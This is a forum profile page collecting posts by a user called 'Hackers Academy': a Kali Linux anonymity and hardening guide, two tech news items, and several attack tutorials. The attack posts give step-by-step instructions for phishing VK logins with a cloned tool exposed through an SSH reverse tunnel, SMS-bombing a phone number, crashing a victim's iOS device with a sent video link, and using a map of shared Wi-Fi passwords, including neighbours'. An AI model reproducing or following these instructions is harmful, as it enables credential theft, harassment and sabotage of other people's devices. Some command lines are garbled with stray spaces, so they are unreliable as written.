Navigation

    Anonymous Hackers

    Anonymous Hackers

    • Register
    • Login
    • Search
    • Categories
    • Popular
    • Users
    • Groups
    • CONTACT
    1. Home
    2. Hackers Academy
    3. Posts
    • Profile
    • Following
    • Followers
    • Topics
    • Posts
    • Best
    • Groups

    Posts made by Hackers Academy

    • How to configure Kali Linux in terms of security and anonymity

      How to configure Kali Linux in terms of security and anonymity

      Greetings to the Hackers!

      As you asked me to post about Kali Linux. Since you didn’t like my posts about Virology Programming and SI

      Okay.

      I decided to roll a small article for those who just decided to master kali linux

      But I will not describe specific tools, their purpose and use. I will tell you how to safely configure the system in terms of security and anonymity, which is now very relevant. So that the poor unfortunate newcomer does not scour the forum search and google, trying to get answers. For this I decided to collect the accumulated material in one place.
      Healthy criticism and additions are welcome.

      All the manipulations described in the article were performed on Kali 64 bit with the Gnome 3 graphical environment.

      For performance on a different capacity or environment, I can not vouch. Do everything at your own peril and risk!

      First, find out what bit depth your system has:

      The code:

      grep -qP ’^ flags \ s *:. * \ blm \ b’ / proc / cpuinfo && echo 64-bit || echo 32-bit

      We write it to a USB flash drive with a volume of 4 Gb using the utility

      We will install Kali Linux on a fully encrypted file system.

      I won’t explain the charms of this particular installation

      After the first login, disable swap through Menu-Utilities-Disks. This is the fastest way:

      No need to use my instruction with rewriting swap from this topic.
      It is for an already used system, but on a freshly installed one, the above is enough!
      Is swap disabled, can be viewed in the System Monitor:

      Check that the repositories in /etc/apt/sources.list have the form:

      Check that the repositories in /etc/apt/sources.list have the form:

      The code:

      deb http://http.kali.org/kali kali-rolling main contrib non-free

      deb-src http://http.kali.org/kali kali-rolling main contrib non-free

      We make sure that each time you connect to the network, the mac changes to random.
      (Thanks @ z3RoTooL for the great tip in my article)
      To do this, the contents of the /etc/NetworkManager/NetworkManager.conf file are changed to:

      The code:

      [main]
      plugins = ifupdown, keyfile

      [ifupdown]
      managed = false

      [connection]
      wifi.cloned-mac-address = random

      [connection]
      ethernet.cloned-mac-address = random

      Now configure ssh correctly and safely, because without it, nowhere:

      The code:

      update-rc.d -f ssh remove
      update-rc.d -f ssh defaults
      cd / etc / ssh /
      mkdir insecure_original_default_kali_keys
      mv ssh_host_ * insecure_original_default_kali_keys /
      dpkg-reconfigure openssh-server

      In the configuration file / etc / ssh / sshd_config, change:

      The code:

      Port 22

      PermitRootLogin without-password

      on

      The code:

      Port 2282
      PermitRootLogin no

      Port 22 is changed to any non-standard (in our case 2282) to protect against brute force.
      PermitRootLogin no prohibits other machines from connecting to the root user on our machine.
      Perhaps in the future you will get your VPS. Therefore, I advise you to connect to it not with a password, but create a key, since it is safer:

      The code:

      ssh-keygen -t rsa

      Hit Enter a few times. The generated key /root/.ssh/id_rsa.pub then put on your server.
      I also do not advise adding the ssh service to startup, but starting / disabling the commands:

      The code:

      service ssh start
      service ssh stop

      Now an important point in the article. Let's make a self-destruct password for the encrypted disk headers.
      In fact, without them, it turns into just a brick. There is an excellent forum article on this topic.
      Let me reduce this process to a minimum:

      The code:

      cryptsetup luksAddNuke / dev / sda5
      Enter any existing passphrase: your encryption phrase
      Enter new passphrase for key slot: Self Destruct Password
      Verify passphrase: Repeat password self-destruct

      cryptsetup luksHeaderBackup --header-backup-file luksheader.back / dev / sda5

      file luksheader.back

      openssl enc -aes-256-cbc -salt -in luksheader.back -out luksheader.back.enc
      enter aes-256-cbc encryption password: Password for the encrypted header
      Verifying - enter aes-256-cbc encryption password: Repeat password for encrypted header

      ls -lh luksheader.back *

      file luksheader.back *

      Files luksheader.back and luksheader.back.enc are stored on encrypted using LUKS
      (can be done using Menu-Utilities-Drives) microsd flash drive somewhere outside the house.
      Some kind of nest in the forest is ideal.
      Now it’s time for us to update the system:

      The code:

      apt-get update && apt-get dist-upgrade

      It is also likely to request, so we remove unnecessary packages:

      The code:

      apt autoremove

      If in the future we want to receive updates via https, then we do:

      The code:

      apt install apt-transport-https

      Check that the repositories in /etc/apt/sources.list have the form:

      The code:

      deb https://http.kali.org/kali kali-rolling main non-free contrib

      deb-src https://http.kali.org/kali kali-rolling main non-free contrib

      And again, update the system:

      The code:

      apt-get update && apt-get dist-upgrade

      Soft Why so? The following is a description of why each tool is needed:

      The code:

      apt-get install mat steghide network-manager-openvpn-gnome secure-delete keepassx pidgin pidgin-otr etherape irssi tor lighttpd virtualbox

      I also think that it’s not superfluous to install and configure something else:
      Bluetooth It does not work normally, so we use the setup manual.
      Ram wiping. Cleans up a core dump on reboot.
      VPN I wrote an article with an example on the riseup service, but the command also works on another resource:

      The code:

      openvpn --client --dev tun --config YOUR_CONFIGURATION.ovpn --proto tcp

      Already purchased a Wi-Fi adapter ALFA or just think? Then we write the script / bin / wlan1 with the contents:

      The code:

      #! / bin / sh

      ifconfig wlan1 down
      macchanger -r wlan1
      iw reg set BZ
      iwconfig wlan1 txpower 30
      ifconfig wlan1 up
      echo "MAC updated ..."
      exit 0

      and make it executable:

      The code:

      chmod + x / bin / wlan1

      Now, when ALFA is connected and the wlan1 command is entered in the terminal, not only will the mac change, but also the power will increase.
      Perhaps you need a Tor browser?
      Do not forget to add the path_to / tor-browser_en-US / Browser / TorBrowser / Data / Tor / torrc to the very bottom of the line:

      The code:

      ExcludeNodes {ru}, {ua}, {by}

      This will exclude connection to dysfunctional nodes. If the provider blocks access: That's all. Of course I can go on forever, but this is for beginners.

      Thank you all for your attention.
      Subscripe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in Blogs
      Hackers Academy
    • In China, announced a smartphone that can detect hidden cameras

      Chinese electronics maker Hisense has announced the Hisense F40 smartphone, which is equipped with the detection function of any infrared camera, even if it is hidden.

      In addition to photos of the device and a story about unusual camera modules, no other details were reported.
      Hisense F40 has been certified by TENAA China Center. The smartphone is equipped with a 6.617-inch display with a resolution of 720 pixels. The phone measures 166.3 76.5 9.19 mm and weighs just 170 g.

      Hisense F40 is equipped with a 5000 mAh battery (4850 mAh according to TENAA). The device runs on an unnamed processor with a clock frequency of 2.0 GHz. The site reports about 8 GB of RAM and 256 GB of internal memory, but most likely there will be other memory options.
      The model stands out the ability of the camera to detect any infrared cameras nearby. The smartphone’s camera consists of a combination of 13MP + 8MP + 2MP + 2MP, all of them are located in the upper left corner vertically. While three sensors are in the same module, a fourth sensor is located under the infrared detector.
      Hisense F40 will be available in Polar Night Black and Star Blue. Hisense has not yet officially announced prices and the start date of sales.
      Add. at the same event, Hisense presented the new King Kong 6 smartphone, the main feature of which was a battery with an impressive capacity of 10,010 mAh. They assure that it is enough for 5 days of work.
      Earlier, HB reported that the Chinese company Hisense introduced the Hisense A5 smartphone, which is equipped with an e-paper-based E-Ink screen. The manufacturer promises that Hisense A5 with such a screen is able to withstand a record 10 days of battery life.

      Hisense A5 is equipped with a 5.84-inch screen with a resolution of 1440 * 720. Black-and-white screens with E-Ink technology do not have blue light emission. For night use, a “soft” adjustable backlight with 2048 levels is used. Unlike modern smartphones, the use of such a screen outdoors does not cause stress for the eyes.
      Subscripe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in News
      Hackers Academy
    • In the iOS-application Facebook found a bug that allows social networks to spy on a user

      Facebook user Joshua Maddex noticed the unusual behavior of the iOS version of the application. While viewing the tape, it suddenly and without the knowledge of the user gets access to the device’s camera. Roughly speaking, Facebook can spy on iPhone owners while they flip through the feed.
      The case was played on five Apple devices with iOS versions 13.2.2. On iOS 12, iOS 13.1.3, and also on Google Pixel 4 with Android 10, the camera did not turn on. This is most likely a bug, although not everyone is sure about it - Facebook does not have the best reputation regarding the use of personal data.
      Until the application is repaired, you can revoke the application’s permission to access the camera in the settings (some suggest temporarily denying access to the microphone).
      Subscripe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in News
      Hackers Academy
    • How to disable any iOS device

      How to disable any iOS device:

      1. Find anyone with absolutely any iOS device.
      2. Copy the link to the video: wylsa.com/VIDOSI/IMG_0942.mp4
      3. Send to the owner of the device from paragraph 1.
      4. He watch the video and after a few minutes his device crashes.
        By the way, you can restore the functionality of the device by making a Hard Reset.
        Subscribe https://vk.com/academy_hacker
        https://anonymoushackers.org/user/hackers-academy
      posted in Blogs
      Hackers Academy
    • Vulnerable Router Database

      Hello Hackers. Hackers Academy with you

      Wi-Fi Space is a multi-platform service for finding vulnerable routers in any city.
      https://wifispc.com/

      Attention !!! There is an Android application and IOS Wifi Space.

      You do not need to download them.

      This is a map of open routers without passwords, and not a database of vulnerable routers.

      The Wifi Space database is available at https://ru.wifispc.com

      1. Go to the site and point to the search. The city where you want to see vulnerable routers. Click on any vulnerable router. You will light up its SSID and password from the router.

      You can also add your own points on this site. For example, the WIFI password of your school, neighbor, etc.
      Subscribe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in Blogs
      Hackers Academy
    • Spam Termux

      Hello everyone. Hacker Academy is with you.
      And so this is already 2 article about Termux.
      Today we would spam using Termux.
      Code:
      apt update

      apt upgrade

      pkg install root-repo

      pkg install unstable-repo

      pkg install x11-repo

      pkg install python

      pkg install python2

      pkg install git

      pip2 install requests

      git clone https://github.com/Noxturnix/Spammer-Grab

      Using:

      cd spammer-grab

      python2 spammer.py (phone number without +)

      Example:

      python2 spammer.py 79000000000

      To change the interval between sending, we write the command

      Python2 spammer.py —delay (Time in sec.) (Phone number without +)

      Example:

      python2 spammer.py --delay 1 79000000000

      That's all

      Hackers Academy was with you.
      Subscribe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in Blogs
      Hackers Academy
    • How to hack vk using Thermux

      Termux - emulator Terminal Android 5+
      download termux for google play and f-droid
      Start Termux
      Code:
      apt update

      apt upgrade

      pkg install root-repo

      pkg install unstable-repo

      pkg install x11-repo

      pkg install python

      pkg install python2

      pkg install openssh

      git clone https://github.com/foxlitegor/fisher

      cd fisher

      chmod 777 install.sh

      sh install.sh

      Код использование:

      fish

      run
      And so now we are creating a new session in Termux. To do this, swipe to the right.

      And click on new session.
      Session 2 opened
      And run using the following command
      ssh -R 80: localhost: 8080 ssh.localhost.run
      Next, we will be given a website address, both http and https. This is a phishing site. We follow the link. And the VK phishing page lights up. We enter the left data. And go to session 1. Swipe to the right and there will be numbers 1 and 2. Press 1. Log in. And there the login and password will glow green.

      That's all. The article has come to an end. Thank you who read. Subscribe to our group. Invite your friends. Let's develop a project about hackers together

      Well, you had the Hackers Academy.
      Subscripe https://vk.com/academy_hacker
      https://anonymoushackers.org/user/hackers-academy

      posted in Blogs
      Hackers Academy